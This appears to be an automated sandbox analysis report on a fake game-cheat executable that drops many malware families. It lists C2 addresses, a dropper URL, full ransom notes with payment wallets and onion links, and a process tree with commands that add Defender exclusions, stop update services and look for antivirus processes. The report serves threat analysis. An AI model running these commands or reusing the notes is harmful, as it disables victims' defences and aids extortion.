Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-09-2024 02:33

General

  • Target

    krunker.iohacks.exe

  • Size

    30.9MB

  • MD5

    2850f1cb75953d9e0232344f6a13bf48

  • SHA1

    141ab8929fbe01031ab1e559d880440ae931cc16

  • SHA256

    892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

  • SHA512

    25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d

  • SSDEEP

    786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.5.128/powercat.ps1

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    fcb-aws-host-4

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Extracted

Family

redline

Botnet

Logs

C2

185.215.113.9:9137

Extracted

Path

F:\DECRYPT-FILES.txt

Family

maze

Ransom Note
Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6c6f0cb68d9a5830 e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6c6f0cb68d9a5830 b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- yS8tagfBs3KTG/zamlnd/CK1svuTJFU/8tDgrkLUDhOlwFUSq/kiNWE7/v7WSaS2uQVTrwjBz5VQm0mYM625Q6Hpo+G9uXgE6Y7A0+4fKohvNLALRRTsNiCM/YIaPXX7tX1cHtcH7ChCs5Cw4An1y0+ehV5z2zocBZN/MmfF/AD/1Q2Gofd0EzyEk02ZWCYvjOlQHsEHWydIeSy290gI0UNMc3EXUluD6q1UywiWawB217LJgCU3JxxrncFwHkRaBHjxVVEp7tR063+jaOtVguxdZ5iXYoV1xCNuoxwvZeciKeBFjoE7VCn3UkCLx+WlfzOaG6zGG5nZywLyrHEUmA2aQ/32q82/l3i4fmgvBloRXlYB+xABV/+gVMPvD4buNBg5BytKrTs00AjvAMM87PdIxpeVjDq4R+8+2ZYXB4lmwx6tRr+mcAkJRTF3Yb2+6168y2ijzXce5Pdlse4CPpFyqPpVvSKQ2wmjcB6Zy21Ypat7FXMzqwWuZS2LiES2tBxKTKjAp+Elk698RoJK2vs4Cz7BUDSlZutS/wP2TOS1XRzI/WFLI0lFHb0sdQVT82Y+QaF9BoEzp44ldkvenL0HPWc4UgFK2PEqSXJHaQ8Jk/FGcyAOCfGbHggmVP1Pg2JSkTscoYWepxK4F8VEqnnmyi/5uFNUqFx3EUzA4mxjlCBeIVc3lb30u6ibnoNlWT2FESPcusTzv4xOdk0lN6Kguy7M7NsDmpjoiRizMlTp7dcp4yRjQcsM4E4dPdfca2ekMixZV0FtkXXYIX+rnguUw6Q5ngjnoHSSNinkhDa5sX2NWqvvYSrREiOiBSHvZTlKXZxYFNsioUNe/IlP5HhxH1wdoUBFkClZfXLpvDnm+pmQq/5aG3QYhRCZvLARibV5ZIGZ+KT8zFzBYemHb627dhqnrb9uEUW3nBI3V4MbE/gfz4k3xHQ2l/nf6WMVSRLaOou2VpJiNcIoOpecQebcgZMP/eINqBZakHPnEuPqgsAKVFhcW+ox8iP4CWDGXjSTH1rEpyf+qvhKb2xCNApnU/pZzem213tYx7yI+cbBhYl2CiOO0ZfSeFGCWYKMD4f7VSqBJJMgegZ6Q8IYWlFoYb/MtUxSmRiBksXvZ+AncESfL3SU4gciFyeUN0DhWIBq9OeD4+eEjjyWOVXc/aO03CrNYPa0ihpZt2mmu2YPDSARpSZjDmWK82gU1bceWwWKHkBQzuOunw9kCrqSeqyiKDZzS1IXks72IN3zrH3uTNgYFMqpNG/TrdenHjdnHMBdKBjzp9rNk8VBTmkOozq0eAEe5TEM7aKcx9raG7PrZBHMNlCwtdUm5yF7b2RXAyq3DOgo2Fy1L3avn34wAdvzHs0ZpgIi77eQqwX8SiamR4gm18IrYQpVYdN5NCwQ/S43qCIUQtV+bC9FA3mSzngasr/tqO8fVJlJoebewZcrur/SuSl4jJoFzQrZXdzhanSko0wbS8Ao0NXpHzwTRItWygtdL7Iru/yx7nfJ6/Jw2kpKXTr2lANSlby1vwMTwsmRsNNy6NLgMOVQdsXnof6G2TUjKfcvE/F2oIuLtspmVePwx/ljsVxnZy+auD1EihLo7YggjletZ/kM3bdIsOwmYUSBCxnuye32c5VpYjfs+plLlgmxMv26BnBCFfrud5PqUTb1MTxx3/XDW6Kc8qr5mYszTtH/ZgKNsxGNUsE0PdYQG7haMn8eGQp8dd2CclHSsalJXyPDJ4taI6qWP7Q4mHpKWPzBvpINrMcDjag8bZFqoJ0MJJVdY4IogkxiMXhGOXXeDZXU4fLk+Mi8NmgPTMkTdycXFuHCP4c3LUy70IRyviRjtYycT2ToeyxCHuX77ybT/e5KjiBCvfOFQ4G4jKcnOn/WSCttdTPxIA6Zq7wt249NTagk4QRYC8lC80mA1WD/akHPniqWLxvlYME6o079meLnvmyy+YExivszQ9p10/3vYnY2i+DpfxgMfVvjHYrZ36SZrQrRav1bSUChRPHNzxrzGiSxa7fvLNcF0WD3o9UGjRRfRay0T+Nqq4iRsLrLU15VYJS6Qoofm+2vXY2k4pbOcpxV7xhY/e22JvESZvuYG7tiXkxVJXyNULBGk6rzqmgUjVpfSHC2IrQfQa2pePqzQtwr0E2hMN+uvfOycyUF9rGcrrUXyE5oAVDdyUpplyWCjZry6WH7h4LIHBoLna4X643k7nB3GEiPZZ8TI5jWeczOfKEFKUAw88D1LgoiNgBjADYAZgAwAGMAYgA2ADgAZAA5AGEANQA4ADMAMAAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAEsAWgBZAEIARgBIAE0ASwAAACoMbgBvAG4AZQB8AAAAMixXAGkAbgBkAG8AdwBzACAAMQAwACAARQBuAHQAZQByAHAAcgBpAHMAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADIAMAAzADYAMQAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADQAMgAwAC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcPWB4HJ4DIABAYoBBTIuMy4x ---END MAZE KEY---
URLs

http://aoacugmutagkwctu.onion/6c6f0cb68d9a5830

https://mazedecrypt.top/6c6f0cb68d9a5830

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\_R_E_A_D___T_H_I_S___3QQDXUI_.txt

Family

cerber

Ransom Note
Hi, I'am CRBR ENCRYPTOR ;) ----- ALL YOUR DOCUMENTS, PH0T0S, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only one way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/E5DB-4FF6-F4B6-0098-B935 Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.1n5mod.top/E5DB-4FF6-F4B6-0098-B935 2. http://xpcx6erilkjced3j.19kdeh.top/E5DB-4FF6-F4B6-0098-B935 3. http://xpcx6erilkjced3j.1mpsnr.top/E5DB-4FF6-F4B6-0098-B935 4. http://xpcx6erilkjced3j.18ey8e.top/E5DB-4FF6-F4B6-0098-B935 5. http://xpcx6erilkjced3j.17gcun.top/E5DB-4FF6-F4B6-0098-B935 ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----
URLs

http://xpcx6erilkjced3j.onion/E5DB-4FF6-F4B6-0098-B935

http://xpcx6erilkjced3j.1n5mod.top/E5DB-4FF6-F4B6-0098-B935

http://xpcx6erilkjced3j.19kdeh.top/E5DB-4FF6-F4B6-0098-B935

http://xpcx6erilkjced3j.1mpsnr.top/E5DB-4FF6-F4B6-0098-B935

http://xpcx6erilkjced3j.18ey8e.top/E5DB-4FF6-F4B6-0098-B935

http://xpcx6erilkjced3j.17gcun.top/E5DB-4FF6-F4B6-0098-B935

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

62.113.117.95:4449

Mutex

hwelcvbupaqfzors

Attributes
  • delay

    10

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

PO

C2

147.124.222.241:47056

Extracted

Family

lumma

C2

https://consciousourwi.shop/api

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • DcRat 8 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Neshta payload 13 IoCs
  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Maze

    Ransomware family also known as ChaCha.

  • Modifies security service 2 TTPs 3 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Phorphiex payload 4 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Ramnit

    Ramnit is a versatile family that holds viruses, worms, and Trojans.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 3 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Windows security bypass 2 TTPs 24 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Contacts a large (1220) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 12 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 13 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 28 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 16 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 6 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 40 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 27 IoCs
  • Modifies registry class 15 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2712
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
        2⤵
          PID:5928
          • C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE
            C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
            3⤵
              PID:7000
        • C:\Windows\Explorer.EXE
          C:\Windows\Explorer.EXE
          1⤵
            PID:3452
            • C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
              "C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
              2⤵
              • DcRat
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1960
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:184
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
                  "4363463463464363463463463.exe"
                  4⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4368
                  • C:\Windows\svchost.com
                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\buildred.exe"
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:3460
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\buildred.exe
                      C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\buildred.exe
                      6⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:4884
                  • C:\Windows\svchost.com
                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pi.exe"
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:1728
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pi.exe
                      C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pi.exe
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:2112
                      • C:\Windows\sylsplvc.exe
                        C:\Windows\sylsplvc.exe
                        7⤵
                        • Windows security bypass
                        • Executes dropped EXE
                        • Windows security modification
                        PID:5640
                        • C:\Users\Admin\AppData\Local\Temp\104712785.exe
                          C:\Users\Admin\AppData\Local\Temp\104712785.exe
                          8⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:7028
                          • C:\Users\Admin\AppData\Local\Temp\3617017388.exe
                            C:\Users\Admin\AppData\Local\Temp\3617017388.exe
                            9⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            PID:6384
                        • C:\Users\Admin\AppData\Local\Temp\2104521398.exe
                          C:\Users\Admin\AppData\Local\Temp\2104521398.exe
                          8⤵
                            PID:7576
                    • C:\Windows\svchost.com
                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\a.exe"
                      5⤵
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:4300
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\a.exe
                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\a.exe
                        6⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • System Location Discovery: System Language Discovery
                        PID:2152
                        • C:\Windows\sysmablsvr.exe
                          C:\Windows\sysmablsvr.exe
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5740
                    • C:\Windows\svchost.com
                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pp.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:5968
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pp.exe
                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pp.exe
                        6⤵
                        • Executes dropped EXE
                        PID:4344
                    • C:\Windows\svchost.com
                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe"
                      5⤵
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:5660
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
                        6⤵
                        • Executes dropped EXE
                        PID:4292
                        • C:\Users\Admin\AppData\Local\Temp\1768712286.exe
                          C:\Users\Admin\AppData\Local\Temp\1768712286.exe
                          7⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1740
                          • C:\Windows\syslyqdvr.exe
                            C:\Windows\syslyqdvr.exe
                            8⤵
                            • Modifies security service
                            • Windows security bypass
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Windows security modification
                            • Modifies registry class
                            • Suspicious behavior: SetClipboardViewer
                            PID:3992
                            • C:\Windows\svchost.com
                              "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              9⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:5388
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\System32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
                                10⤵
                                  PID:6180
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
                                    11⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5696
                              • C:\Windows\svchost.com
                                "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                9⤵
                                • Executes dropped EXE
                                PID:5596
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                  10⤵
                                    PID:6412
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop UsoSvc
                                      11⤵
                                      • Launches sc.exe
                                      PID:2804
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop WaaSMedicSvc
                                      11⤵
                                      • Launches sc.exe
                                      PID:7116
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop wuauserv
                                      11⤵
                                      • Launches sc.exe
                                      PID:6700
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop DoSvc
                                      11⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:3612
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc stop BITS
                                      11⤵
                                      • Launches sc.exe
                                      PID:6008
                                • C:\Users\Admin\AppData\Local\Temp\261651857.exe
                                  C:\Users\Admin\AppData\Local\Temp\261651857.exe
                                  9⤵
                                    PID:5644
                                  • C:\Users\Admin\AppData\Local\Temp\3250810317.exe
                                    C:\Users\Admin\AppData\Local\Temp\3250810317.exe
                                    9⤵
                                      PID:6656
                            • C:\Windows\svchost.com
                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe"
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:4900
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe
                                6⤵
                                • Executes dropped EXE
                                PID:1772
                                • C:\Users\Admin\AppData\Local\Temp\2802026625.exe
                                  C:\Users\Admin\AppData\Local\Temp\2802026625.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5900
                            • C:\Windows\svchost.com
                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\4ck3rr.exe"
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              PID:1876
                            • C:\Windows\svchost.com
                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\twztl.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:5388
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\twztl.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\twztl.exe
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Windows directory
                                PID:4568
                                • C:\Users\Admin\sysmablsvr.exe
                                  C:\Users\Admin\sysmablsvr.exe
                                  7⤵
                                  • Modifies security service
                                  • Windows security bypass
                                  • Executes dropped EXE
                                  • Windows security modification
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: SetClipboardViewer
                                  PID:3188
                                  • C:\Users\Admin\AppData\Local\Temp\374830337.exe
                                    C:\Users\Admin\AppData\Local\Temp\374830337.exe
                                    8⤵
                                      PID:5284
                                    • C:\Users\Admin\AppData\Local\Temp\129557613.exe
                                      C:\Users\Admin\AppData\Local\Temp\129557613.exe
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7364
                              • C:\Windows\svchost.com
                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C71E~1.EXE"
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:4364
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C71E~1.EXE
                                  C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\66C71E~1.EXE
                                  6⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  PID:1704
                                  • C:\Windows\svchost.com
                                    "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Monday Monday.cmd & Monday.cmd & exit
                                    7⤵
                                    • Executes dropped EXE
                                    PID:6356
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\System32\cmd.exe /k move Monday Monday.cmd & Monday.cmd & exit
                                      8⤵
                                        PID:6420
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist
                                          9⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:6068
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /I "wrsa.exe opssvc.exe"
                                          9⤵
                                            PID:4948
                                          • C:\Windows\SysWOW64\tasklist.exe
                                            tasklist
                                            9⤵
                                            • Enumerates processes with tasklist
                                            • System Location Discovery: System Language Discovery
                                            PID:2192
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                            9⤵
                                            • System Location Discovery: System Language Discovery
